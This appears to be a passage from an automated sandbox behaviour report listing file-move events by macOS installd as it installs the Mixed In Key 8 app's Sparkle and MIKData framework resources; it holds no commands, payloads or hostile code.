Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/.BC.T_ovksuW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ru.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_mpdGnd -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/SUStatus.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_cALxpv -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_5Lz2oT -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_nKHZvS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_Bnswmo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_YBybjs -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_ilL9gG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_2eeN3o -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/.BC.T_VFQe3B -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/nl.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_RHYZHo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_6SfLzu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_QNHIz1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_MqD6Yj -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_6kMUxA -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/License.txt	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_soEDwr -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/Sparkle.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_I0c7IW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUAutomaticUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_RmnWMc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUPasswordPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_bjvwvQ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdatePermissionPrompt.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/.BC.T_ZdbPky -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/ro.lproj/SUUpdateAlert.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/.BC.T_zmBX5I -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/.BC.T_bIODiK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Sparkle	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/.BC.T_Sj0766 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/MIKUpdate	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/.BC.T_weiDsi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_HjMl4l -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/3to4.cdm	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_vfSU11 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5ToMIK6.cdm	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_SjqKYZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/MIK5BetaTo5MappingModel.cdm	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ry08Gm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 2.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_DmROhG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_E44pIC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 8.omo	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_ecl5oB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 4.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_hgnqY3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 5.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_TpVHY3 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/VersionInfo.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_plS1qb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 7.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_2hRaMX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 6.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OKMcMp -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 3-mashup.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_OPbYq8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_Y60j5R -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/DataModel 8.mom	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_5qAkPg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/Info.plist	Jump to behavior
